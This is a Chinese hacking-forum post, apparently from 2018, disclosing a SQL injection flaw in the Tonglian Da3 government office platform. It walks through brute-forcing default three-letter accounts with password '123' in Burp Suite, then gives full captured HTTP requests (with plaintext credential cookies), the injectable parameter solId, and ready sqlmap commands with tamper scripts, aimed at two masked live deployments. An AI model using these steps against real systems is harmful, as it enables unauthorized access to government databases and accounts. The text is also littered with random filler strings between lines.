找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1542|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

. G3 f. B' z) ?; R- o
0 B$ B5 K( O; e" f

. y5 J! ]3 B [3 _

* h( q! d+ X2 _: z( O1 Y" n 平台简介: ) i' ^# `$ h; L7 n3 b

2 A; c! Y3 b2 h2 z; [; k5 Q- H! b

% i* j4 I6 ?/ k/ T5 o$ g" }; V9 c  0 X0 U0 w' P- X0 ?5 {

' r# ]4 o# p0 D7 f2 o' G

) Y I( _( i8 r# t) W 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
( d7 F6 Q; {4 \2 Q- ^+ \, E 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* W7 Y5 s8 }8 r$ O0 g. j* k同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!) x$ v5 f9 K5 e

1 I- F2 \7 N8 z X( B1 |. H/ ?

# ~5 h# @0 |2 y( { L: M   . b% e$ j7 ]( K9 j

" `: V* o7 }* r" {6 g1 W

! O0 g8 ^" t# u) V; l3 H- M# u 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: 3 z' ?4 e! G; c) W

0 `! p6 w- T4 e( z+ K( q5 l

0 H* p- A, D h. o* ~ G: M   8 C6 T1 H7 ]; t* S# ~+ |+ ^

& C9 `2 G+ K+ k5 e

, X# N; X; o% { http://1.1.1.1:7197/cap-aco/#(案例2-) }7 m# S9 s7 U

3 B$ }) r* F: ]

: P% \) f; Q* i" w0 ]1 S# V) } http://www.XXOO.com (案例1-官网网站)4 t9 M) F2 D& w* C+ [) F

4 K1 V1 {* x; d7 @/ ]/ K

9 q9 e: l! w/ i2 l* u  1 F b j3 R+ C( R

! [1 S' L6 f# a

3 M8 Q( G2 r' P! Q% }- l! r 漏洞详情: - @1 H- e7 m( h1 O

8 N* |/ F @, J3 L, n- ~7 V

- v& B: D: T8 a' k, [  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试9 ]7 E6 q1 Q, T' P7 j: h1 U

! P9 v" T% b, V* P

8 ^ G0 L* V9 c G; e      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:, n+ q# ^7 K4 V9 M

3 S! c$ ~. ]( s

0 K) s. N( T5 P( i: H: k! _9 O  2 w) n6 Q0 s3 H6 j4 K! `" C

2 H6 b5 s0 U; I# S& y

# K8 ?& U. l- W% H4 w+ S$ [   1 [5 n7 [/ P; X

4 N9 {$ n/ ^. X

6 Q. Y) Z. k6 u status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: 8 s- ?6 \2 b0 k% ?

n2 ^' Q- D+ e p

; d3 g$ X8 E5 u( `( M, X& D H 1、案例1-官方网站- d( S2 y3 u/ C+ F h r4 M

9 U- W) ~0 Z6 A

. Q3 @$ ]& W s GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1- c2 g9 c1 h7 C6 q1 W

- z* O- A: m% |

( e- F6 g0 ~! C* C' Y: s7 T. R& | Host: www.XXOO.com 9 S/ E6 d" q! u+ e4 w4 d

! X+ g- ~, o ]) u

% N" f e8 R+ z' F9 e& U Proxy-Connection: Keep-Alive ; I! c( K/ f# V

+ s6 Q! F, F! ~$ q& {) p

' [2 I! @2 o' \/ O Accept: application/json, text/javascript, */*; q=0.01 ; Z, g) x3 w/ ^$ w; E

. @8 e, |- ~8 u0 T) G

3 e/ n8 S' I6 h' P4 G Accept-Language: zh-CN 0 n" s }2 x$ o' S' l

. d$ y& ^% `7 M. T; k0 Q7 Z0 g

! R1 v2 p5 N/ w. u Content-Type: application/json7 ^6 y3 l" Q. y+ [5 d3 z. R5 d+ x

, b, z: ]" h: b/ f1 b

( k4 m- Q# i& d, c' W/ z User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko % u' I: {. r3 C# f

& W3 E, d! K; a) A+ F1 r5 f. G

- r& n( ]+ j" q0 B) S X-Requested-With: XMLHttpRequest 3 J2 D$ R8 C& k* S1 i2 Q) d( ]! X

7 e) k" T) ~: g8 i5 k

* q9 |8 k# M, l: k Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 " B. i' k ]& j$ B! ]

( T: C; f. H% d& s: L7 b, U; U

" P' f4 _ }: J Accept-Encoding: gzip, deflate, sdch w" Q6 j: z1 p8 t% G7 ~+ S- P

7 U: [+ q0 C9 h/ f1 Z; c5 ^. r- w

+ A2 s, @7 W6 G Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e 5 u9 q! b- M- L, M# N. o3 w( S+ s

$ u. x' j( F, b+ p: Y

8 M& x3 z+ A9 ^- _! B; S: s8 y2 V* o 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:/ L8 }0 _! \3 A8 R7 U3 q

, b3 u1 i7 j" n* Y. m

( M8 U# ?+ Z* f- U5 W; Y/ j  1 z$ K+ i" o2 t0 W

1 ~+ k! r" R% H: B

2 l1 W5 x. |. X8 T, k0 Z0 k  9 ], J) s% \1 b. P* K/ C2 M

2 A) d) J! g2 u' e

% }8 r& a/ c4 e% f7 P  1 m5 I. E5 M% M+ O3 d& G$ r! k% N

- _6 V" d. Q! T6 H, n Q

% m/ m0 L/ ^. }  : z3 P+ Q( J M! d4 ?

* s P: E" O! e4 }8 h. b: @

% b9 |: x& f7 J   8 [& k) Z0 j; K& v* I9 e

# [5 P+ B" T+ H# h/ y: w+ Q8 _

, @: u2 E/ H$ l7 \; N( v5 W ~ 2、案例2-某天河云平台 / a9 O& r% m" ^' y# y2 ?

4 T2 W% ~ t% Y

$ G- Q- O) K0 }! f4 L% @0 w F+ ? GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 - G' g; b+ U& t& J% C

# w5 K/ l5 W) N

) V9 i1 o8 D( I Host: 1.1.1.:7197 6 I) I* P7 u. _" z- B! V

- H ^' j& Q$ J+ K! ~) g

2 k8 f* S+ l' Z4 L Accept: application/json, text/javascript, */*; q=0.01 , f# Y7 F- v! e+ @

) e4 w/ y& _) [$ x

3 [( {0 S& N$ p0 g; X4 } X-Requested-With: XMLHttpRequest) n i3 t' {; N- d" U+ I( x

! \/ |! H) X1 _% q* y8 k$ v

5 |# e9 \2 _& Y! H: [' x User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0" F$ x. L1 Z, o2 ]3 M2 z

8 a; K+ p) Z7 k6 g

% e7 o, t8 l4 k B# v% s7 ^ Content-Type: application/json8 q" f2 ?* _) h' J

3 q6 y+ T5 e) }' W8 c

" O6 m, ?/ `0 y" Z Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10086 b. L& @0 M* }4 c4 C, W2 a, B

/ ]/ M* d4 R R

, Y. Z$ k* f. \1 y Accept-Language: zh-CN,zh;q=0.8 % O* S, h3 W) g( q% `

" |3 U2 E, D& M8 n' N

3 \0 I- j8 S5 ?5 s7 ^) S3 @ Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 : U! B8 A, J8 r: j: k

% K; m. n8 m. F& c5 Q" n

0 G9 p9 ], g* x4 C; h/ H$ E Connection: close8 y. [7 z, Q# ]/ V6 }, D" S( S

3 X( J/ ]3 ~5 t* m

4 Y' O* Z& z7 R" L7 F 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: ' v0 Z; T+ {* v1 N7 `

# h) G5 d0 B, r# ^% ?" ~) B5 x9 |

7 c7 Y9 p/ H2 Y; c& M   0 X& _% M7 V! H3 H, g

7 l+ x* P6 l+ l; U" K$ r

3 J5 J8 O% Y' @2 g7 q& ~* G" |9 R: L
# _' f2 o" f( s; J/ M

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表